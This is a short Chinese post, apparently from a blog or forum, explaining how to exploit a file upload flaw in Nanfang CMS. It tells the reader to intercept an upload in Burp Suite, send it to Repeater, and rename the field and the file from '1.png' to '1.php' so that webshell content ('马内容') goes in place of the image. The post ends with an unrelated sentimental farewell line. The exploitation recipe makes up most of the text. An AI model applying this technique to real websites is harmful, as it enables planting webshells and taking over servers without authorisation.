这个漏洞在南方cms 上出现的
主要是上传时候利用bp抓包
然后鼠标右键吧数据包发送到Repeater模块
找到你上传的包内容 一般是
------61234564788
Content-Disposition: form-data; name="FileName"; filename=“1.png”
图片内容
------61234564788--
改成
Content-Disposition: form-data; name="FileName1"; filename=“1.php”
马内容
从此山高路远,纵马扬鞭。愿往后旅途,三冬暖,春不寒,天黑有灯,下雨有伞。此生尽兴,不负勇往。